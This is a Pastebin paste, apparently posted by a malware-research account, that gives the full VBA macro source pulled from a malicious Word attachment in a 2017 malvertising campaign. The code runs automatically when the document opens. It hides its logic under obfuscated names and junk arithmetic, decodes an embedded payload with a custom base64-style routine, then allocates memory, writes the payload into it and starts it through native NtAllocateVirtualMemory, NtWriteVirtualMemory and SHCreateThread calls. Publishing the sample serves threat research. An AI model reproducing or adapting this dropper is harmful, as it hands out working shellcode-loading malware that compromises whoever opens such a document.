API tools faq
paste
MalwareMustDie

Malvertisement Downloaded FTC .doc

MalwareMustDie
Jan 26th, 2017
46
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 11.07 KB | None | 0 0
raw download clone embed print report
  1. Malvertisement 27h Jan 2017
  2.  
  3. Attachment: .DOC with VBA:
  4.  
  5.  
  6.  
  7. ////////////////////////
  8.  
  9. ThisDocument.cls
  10.  
  11. /////////////////////////
  12.  
  13.  
  14. Sub dup()
  15.     Dim Range1 As Range, Range2 As Range
  16.     Set Range1 = Selection.Range.Duplicate
  17.     Set Range2 = ActiveDocument.Bookmarks(1).Range
  18.     Range2.Paragraphs(1).Range = Range2
  19. End Sub
  20.  
  21. Sub investments()
  22. Dim lackadaisical As String
  23. Dim biotic As Long
  24. transportation = ThisDocument.ComputeStatistics(wdStatisticPages)
  25. rickettsiales.cranks.Value = transportation + 9
  26. chancroid = "bitthead"
  27. darkie = "who"
  28. crocodile = "headed"
  29. Set fanlight = rickettsiales.cranks.SelectedItem
  30. deprivement = 18
  31. acridotheres = 23648
  32. idea = 481150
  33. eastertide = SLN(idea, acridotheres, deprivement)
  34.  
  35. gecko = fanlight.Name
  36. selma = 7460
  37. atoms = Right(gecko, selma)
  38. banewort = arbitral.heartlessness(atoms)
  39. muskwood = 26
  40. pepper = 24330
  41. aphakic = 212625
  42. pessimistically = SLN(aphakic, pepper, muskwood)
  43.  
  44. autotelism = "inorganized"
  45. #If Win64 Then
  46. Dim burrock As String
  47. Dim powerhouse As LongPtr
  48. Dim buccal As LongPtr
  49. Dim embedded As String
  50. #Else
  51. Dim rigueur As Long
  52. Dim buccal As Long
  53. Dim barrelhouse As Long
  54. Dim powerhouse As Long
  55. #End If
  56. vapid = 0
  57. carefully = "fairy"
  58. mensural = 21 - 102 + 4177
  59. meditative = 111
  60. cypress = 9711
  61. eira = 265191
  62. cypress = Pmt(0.0838, meditative, -24882, eira, 1)
  63.  
  64. vicious = "cranny"
  65. progressivism = "cyamopsis"
  66. chipboard = 24
  67. gaminess = 32872
  68. beggarweed = 430353
  69. fertile = SLN(beggarweed, gaminess, chipboard)
  70.  
  71. examen = banewort
  72. undutiful = "pinball"
  73. aethusa = "georges"
  74. powerhouse = mizzle(examen)
  75. doublebedded = "fecundate"
  76. #If Win64 Then
  77. Dim thermoscope As Integer
  78. Dim barkantine As LongPtr
  79. hopsacking = "southsoutheast"
  80. cynipidae = "derail"
  81. inclinometer = "ironhearted"
  82. Dim be As LongPtr
  83. affecting = 1 - 78 + 1357
  84. #ElseIf Win32 Then
  85. twixt = "anthonys"
  86. blancbec = "longwinded"
  87. caeciliidae = "flagelliform"
  88. Dim barkantine As Long
  89. haploid = 86 + 55 + 373
  90. Dim be As Long
  91. affecting = haploid + 3204
  92.  
  93. #End If
  94. Dim freudian As String
  95. Dim maneater As Long
  96. barkantine = 0
  97. buccal = powerhouse + affecting
  98. be = 1
  99. adjectives = caliph(buccal, barkantine, be, barkantine)
  100. fires = 45
  101. reprehension = 3809
  102. countless = 170556
  103. reprehension = Pmt(0.0704, fires, -5731, countless, 1)
  104.  
  105. End Sub
  106.  
  107. Private Sub Document_Open()
  108. Dim unemployed As Integer
  109. Dim doxorubicin As Byte
  110. fleshiness = "unbidden"
  111. pronouns = "le" & "adin" & "g"
  112. investments
  113. vivification = 13
  114. awkwardly = 35578
  115. canescent = 263254
  116. manners = SLN(canescent, awkwardly, vivification)
  117. End Sub
  118. Function goldthread(ene, goodfellow, tropaeolum)
  119. #If Win64 Then
  120. Dim adorable As Variant
  121. Dim anthropologist As String
  122. Dim processional As LongPtr
  123. Dim recessive As LongPtr
  124. Dim dolomite As LongPtr
  125. Dim melissa As Byte
  126. Dim adrenaline As LongPtr
  127. Dim toxotes As LongPtr
  128. #Else
  129. Dim recessive As Long
  130. Dim oystercatcher As Byte
  131. Dim processional As Long
  132. Dim forelock As Integer
  133. Dim adrenaline As Long
  134. Dim circumcise As String
  135. Dim dolomite As Long
  136. Dim tent As Long
  137. Dim toxotes As Long
  138. Dim forger As Long
  139. Dim designer As Variant
  140. #End If
  141. illdisposed = Rnd(333.4305 + 85.395)
  142. illdisposed = impala And 300
  143. recessive = ene
  144. toxotes = tropaeolum
  145. illdisposed = Rnd(429.7022 + 99.6392)
  146. adrenaline = goodfellow
  147. choosing = 29
  148. cantonment = 27550
  149. biol = 137902
  150. scathful = SLN(biol, cantonment, choosing)
  151.  
  152. molidae = prickle
  153. processional = 5 - 6
  154. psittacosis ByVal processional, recessive, adrenaline, toxotes, dolomite
  155. impala = Rnd(384.3084 + 86.6341)
  156. End Function
  157. Function mizzle(bench)
  158. Dim goldenseal As String
  159. Dim birdwitted As String
  160. Dim flay As String
  161. Dim ce As Variant
  162. #If Win64 Then
  163. Dim neuroglia As String
  164. Dim reverseless As LongPtr
  165. csorcery = 8
  166. Dim foxglove As Long
  167. Dim cacogenesis As LongPtr
  168. Dim guano As Integer
  169. Dim armageddon As LongPtr
  170. Dim adorable As Byte
  171. #Else
  172. Dim concoction As String
  173. Dim reverseless As Long
  174. csorcery = 4
  175. Dim cacogenesis As Long
  176. Dim tatterdemalion As Byte
  177. Dim armageddon As Long
  178. Dim inactive As Byte
  179. Dim hypocrite As Byte
  180. #End If
  181. caviar = goldthread(VarPtr(reverseless), VarPtr(bench) + 8, csorcery)
  182. magnetize = 97 - 98
  183. cacogenesis = 0
  184. garganey = 0
  185. armageddon = 9671
  186. funicular = 4096
  187. fray = 93 - 29
  188. authority = hallucinogenic(ByVal magnetize, cacogenesis, ByVal garganey, armageddon, ByVal funicular, ByVal fray)
  189. prickle = "pulley"
  190.  
  191. molidae = prickle
  192.  
  193. goldthread cacogenesis, reverseless, 37 + 5557
  194. Align = 25
  195. earthgoddess = 27500
  196. charitable = 450601
  197. aggregation = SLN(charitable, earthgoddess, Align)
  198.  
  199. mizzle = cacogenesis
  200. End Function
  201.  
  202. ////////////////////
  203.  
  204. arbitral.bas
  205.  
  206. /////////////////////
  207.  
  208. #If Win64 Then
  209. Public Declare PtrSafe Function hastiness Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal bestride As LongPtr,howbeit As LongPtr,jauntily As LongPtr,aristocratic As LongPtr,detachable As LongPtr) As Boolean
  210. Public Declare PtrSafe Function westernization Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (basking As LongPtr, biconvex As Any,epoxy As LongPtr, mesembryanthemum As Any) As Boolean
  211. Public Declare PtrSafe Function hallucinogenic Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (americanization As LongPtr, cantibus As LongPtr, ByVal campyloneurum As LongPtr,exasperatingByVal As LongPtr, cognominal As LongPtr, ByVal brahimism As LongPtr) As LongPtr
  212. Public Declare PtrSafe Function caliph Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal earlyish As LongPtr, ByVal ruinousness As Any, ByVal barbarism As LongPtr, ByVal bijouterie As LongPtr) As LongPtr
  213. Public Declare PtrSafe Function toothy Lib "Shell32.dll" Alias "SHGetSettings" (brutalization As LongPtr,oestridae As LongPtr) As LongPtr
  214. Public Declare PtrSafe Function endoparasitic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (adulatory As LongPtr)
  215. Public Declare PtrSafe Function psittacosis Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal concealment As Any, ByVal compressed As Any, ByVal enchiridion As Any, ByVal tremendous As Any, ByVal manakin As Any) As LongPtr
  216. Public Declare PtrSafe Function sponginess Lib "Kernel32.dll" Alias "LocalFree" (holocentrus As LongPtr) As LongPtr
  217. #Else
  218. Public Declare Function antiaircraft Lib "Shell32.dll" Alias "SHGetDesktopFolder" (feather As Long)
  219. Public Declare Function breathing Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (arbitrariness As Long, diltiazem As Any, morrow As Long, mercuric As Any) As Boolean
  220. Public Declare Function psittacosis Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal foolhardness As Any, ByVal stealthy As Any, ByVal gamy As Any, ByVal abatis As Any, ByVal tangibility As Any) As Long
  221. Public Declare Function hallucinogenic Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (tempest As Long, acardia As Long, ByVal stolen As Long, attilaByVal As Long, tempus As Long, ByVal expectancy As Long) As Long
  222. Public Declare Function periplus Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal droll As Long, capped As Long, glycolysis As Long, epicedium As Long, murderer As Long) As Boolean
  223. Public Declare Function shrilling Lib "Shell32.dll" Alias "SHGetSettings" (brachycephalic As Long, psettichthys As Long) As Long
  224. Public Declare Function caliph Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal normalness As Long, ByVal daddy As Any, ByVal exploited As Any, ByVal labryrinthian As Any) As Long
  225. Public Declare Function spiroid Lib "Kernel32.dll" Alias "LocalFree" (olfactories As Long) As Long
  226. #End If
  227.  
  228. Function heartlessness(blackened) As String
  229. Dim orbignya(6965) As Byte
  230. Dim betrothment As Long
  231. faenum = faenum
  232.  
  233. Dim battleground(63) As Long
  234. Dim mutational() As Byte
  235. Dim oppugnancy As Long
  236. Dim seersucker As Long
  237. Dim wiedersehen As Long
  238. illdisposed = Rnd(200.2407 + 359.8327)
  239.  
  240. Dim affrication(63) As Long
  241. Dim dearborn As String
  242.  
  243. Dim archivist As Integer
  244.  
  245. Dim circularization(63) As Long
  246. Dim ciderpress As Integer
  247. Dim juste As Long
  248.  
  249. Dim tribunal As String
  250. prickle = molidae
  251.  
  252. sententiae = 262144
  253. cheremis = 87 + 169
  254. borrowing = 64
  255. bigwig = 65536
  256. again = 79 - 17 + 16711618
  257. faire = 83 + 257965
  258. Dim baud As String
  259.  
  260. baddeleyite = 4032
  261. cambric = 63
  262. saururaceae = 107 - 9 + 157
  263. coccoidea = 4096
  264. Dim peculation As Variant
  265.  
  266. municipal = 65280
  267. Dim barbaresque As Integer
  268.  
  269. cryptograph = 103 + 16514969
  270. Dim mulct As Byte
  271. muskrat = 66 - 66
  272. morceau = 7459
  273. Dim microorganism() As Byte
  274. microorganism = VBA.StrConv(blackened, vbFromUnicode)
  275. Dim paean As Integer
  276. nonaddictive = 35
  277. bare = 21435
  278. decorously = 179895
  279. euthanasia = SLN(decorously, bare, nonaddictive)
  280.  
  281. ambystoma = 7459
  282. bodybuilding = 101 - 114 + 6 + 42
  283. bigfoot = Log(100) / Log(10) + 14
  284. For certainly = 0 To ambystoma
  285. If certainly Mod 2 = 0 Then
  286. microorganism(certainly) = microorganism(certainly) + bigfoot
  287. Else
  288. microorganism(certainly) = microorganism(certainly) + bigfoot - 1
  289. End If
  290. Next certainly
  291. furfur = 11
  292. rahu = 19763
  293. carroty = 415949
  294. rahu = Pmt(0.0613, furfur, -39794, carroty, 1)
  295.  
  296. ciderpress = 0
  297. epiphytotic = 0
  298. wasp = 43
  299. muggee = cosm
  300. For wiedersehen = 0 To 63
  301. battleground(wiedersehen) = perdrix(wiedersehen, borrowing, 3)
  302. circularization(wiedersehen) = perdrix(wiedersehen, coccoidea, 3)
  303. affrication(wiedersehen) = perdrix(wiedersehen, sententiae, 3)
  304. Next wiedersehen
  305. civile = 14
  306. acne = 27662
  307. callithrix = 365900
  308. hobbyist = SLN(callithrix, acne, civile)
  309.  
  310. mutational = microorganism
  311. bonne = 4
  312. alexander = 41
  313. dactylopiidae = 35017
  314. sleepily = 420618
  315. jakes = SLN(sleepily, dactylopiidae, alexander)
  316.  
  317. adelges = 73 - 70
  318. illdisposed = Rnd(101.4165 + 261.2198)
  319.  
  320. impala = VBA.Math.Round(441.5128 + 159.7512)
  321.  
  322. acquisitiveness = adelges + 1
  323. dishwashing = 2
  324. For seersucker = 0 To ambystoma
  325. baccate = mutational(seersucker)
  326. pleurodynia = mutational(seersucker + 2)
  327. oppugnancy = affrication(muggee(baccate)) _
  328.  + circularization(muggee(mutational(seersucker + 1))) + battleground(muggee(pleurodynia)) + muggee(mutational(seersucker + adelges))
  329. wiedersehen = perdrix(oppugnancy, again, 2)
  330. orbignya(betrothment) = perdrix(wiedersehen, bigwig, 1)
  331. wiedersehen = perdrix(oppugnancy, municipal, 2)
  332. orbignya(betrothment + 1) = perdrix(wiedersehen, cheremis, 1)
  333. orbignya(betrothment + dishwashing) = perdrix(oppugnancy, saururaceae, 2)
  334. betrothment = betrothment + dishwashing + 1
  335. seersucker = seersucker + 3
  336. Next
  337. heartlessness = orbignya
  338. End Function
  339.  
  340. Sub tableSel()
  341.     Dim tempTable
  342.     Documents("Log.doc").Tables(1).Select
  343.     Set tempTable = Selection.Tables(1).Range
  344.     tempRange.Tables(2).Select
  345. End Sub
  346.  
  347.  
  348. Function spatterdash(archiepiscopal)
  349. spatterdash = AscW(archiepiscopal)
  350. End Function
  351. Function cosm()
  352. Dim unconvincing(255) As Byte
  353. roisterer = 65
  354. Do
  355. unconvincing(roisterer) = roisterer - 65
  356. roisterer = roisterer + 1
  357. Loop Until roisterer = 91
  358. roisterer = 48
  359. Do
  360. unconvincing(roisterer) = roisterer + 4
  361. roisterer = roisterer + 1
  362. Loop Until roisterer = 58
  363. roisterer = 97
  364. Do
  365. unconvincing(roisterer) = roisterer - 71
  366. roisterer = roisterer + 1
  367. Loop Until roisterer = 123
  368. unconvincing(47) = 63
  369. roisterer = 43
  370. unconvincing(roisterer) = 62
  371. cosm = unconvincing
  372. End Function
  373. Function perdrix(maniple, palm, abience)
  374. Select Case abience
  375. Case 1
  376. perdrix = maniple \ palm
  377. Case 2
  378. perdrix = maniple And palm
  379. Case 3
  380. perdrix = maniple * palm
  381. End Select
  382. End Function
  383.  
  384. #Recorded by MMD
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!